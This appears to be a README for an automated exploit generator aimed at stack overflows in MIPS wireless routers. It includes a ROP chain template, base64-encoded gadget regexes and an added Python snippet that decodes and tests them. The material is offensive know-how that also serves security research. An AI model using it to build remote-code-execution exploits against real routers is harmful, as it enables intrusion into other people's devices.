Router Exploit Shovel – Automated Application Generation For Stack Overflow Types On Wireless Routers

Router Exploit Shovel is an automated application generation tool for stack overflow types on wireless routers. The tool implements the key functions of exploits: it can adapt to the length of the data padding on the stack, generate the ROP chain, generate the encoded shellcode, and finally assemble them into a complete attack code. The user only needs to paste the attack code into the overflow location of the POC to complete the exploit for remote code execution.
The tool supports MIPSel and MIPSeb. It runs on Ubuntu 16.04 64-bit.
exploitation process. Regex matching is used to find available gadgets to fill in the chain strings. Base64 encoding is used to avoid duplicate character escapes. For example:

chainString: (gadget2)(gadget1)BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB(sleep)CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC(call_code)DDDD(stack_gadget)x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44
gadget1: KC4qKW1vdmUgXCR0OVwsIFwkczE7IGx3IFwkcmFcLCAweDI0XChcJHNwXCk7IGx3IFwkczFcLCAweDIwXChcJHNwXCk7IGx3IFwkczBcLCAweDFjXChcJHNwXCk7KC4qKTsganIgXCR0OTsgYWRkaXUgXCRzcFwsIFwkc3BcLCAweDI4Ow==
#gadget1: (.*)move $t9, $s1; lw $ra, 0x24($sp); lw $s1, 0x20($sp); lw $s0, 0x1c($sp);(.*); jr $t9; addiu $sp, $sp, 0x28;
gadget2: KC4qKWFkZGl1IFwkYTBcLCBcJHplcm9cLCAxOyBtb3ZlIFwkdDlcLCBcJHMxOyBqYWxyIFwkdDk7
#gadget2: (.*)addiu $a0, $0, 1; move $t9, $s1; jalr $t9;
call_code: KC4qKW1vdmUgXCR0OVwsIFwkczI7IGphbHIgXCR0OTs=
#call_code: (.*)move $t9, $s2; jalr $t9;
stack_gadget: KC4qKWFkZGl1IFwkczJcLCBcJHNwXCwgMHgxODsoLiopbW92ZSBcJHQ5XCwgXCRzMDsgamFsciBcJHQ5Ow==
#stack_gadget: (.*)addiu $s2, $sp, 0x18;(.*)move $t9, $s0; jalr $t9;
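
An added example, not part of the tool's own code: decoding two of the base64 entries from the config above shows the regex each one holds, and running them against constructed disassembly lines shows that the match is literal, so the $zero inside gadget2 does not match a line that writes the register as $0. The function names and the two sample lines are assumptions made for this illustration.

```python
import base64
import re

# Two entries copied from the config shown above (gadget2, call_code).
CONFIG = """\
gadget2: KC4qKWFkZGl1IFwkYTBcLCBcJHplcm9cLCAxOyBtb3ZlIFwkdDlcLCBcJHMxOyBqYWxyIFwkdDk7
call_code: KC4qKW1vdmUgXCR0OVwsIFwkczI7IGphbHIgXCR0OTs=
"""

# Constructed disassembly lines (not taken from any real firmware).
SAMPLE_ZERO = "addiu $a0, $zero, 1; move $t9, $s1; jalr $t9;"
SAMPLE_NUM = "addiu $a0, $0, 1; move $t9, $s1; jalr $t9;"


def decode_patterns(config_text):
    """Return {name: regex source} for every 'name: <base64>' entry."""
    patterns = {}
    for line in config_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue  # blank line or plain-text comment
        name, _, value = line.partition(":")
        try:
            raw = base64.b64decode(value.strip(), validate=True)
            source = raw.decode("ascii")
            re.compile(source)  # reject entries that are not valid regexes
        except (ValueError, re.error):
            continue  # e.g. chainString, which is not base64
        patterns[name.strip()] = source
    return patterns


def readable(source):
    """Drop the regex backslash escapes so the pattern reads like disassembly."""
    return re.sub(r"\\(.)", r"\1", source)


def matching(patterns, gadget_text):
    """Names of the patterns that match one disassembly line."""
    return sorted(n for n, src in patterns.items() if re.match(src, gadget_text))


if __name__ == "__main__":
    decoded = decode_patterns(CONFIG)
    for name, source in decoded.items():
        print(name, "->", readable(source))
    print("$zero form:", matching(decoded, SAMPLE_ZERO))
    print("$0 form:   ", matching(decoded, SAMPLE_NUM))
```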

Attackblocks
The generated attack blocks are written to outcomes/attackBlocks.txt.

Dependencies

  • Ropper: A superior tool for dumping binary information and producing ROP chains. https://github.com/sashs/Ropper
  • filebytes: Library to read and edit files in ELF, PE, MachO and OAT formats. https://scoding.de/filebytes-introduction
  • yaml: YAML Ain’t Markup Language. https://yaml.org/
  • optparse: Parser for command line options. https://docs.python.org/3/library/optparse.html
  • Capstone: Disassembly framework. http://www.capstone-engine.org/
  • re: Regex module.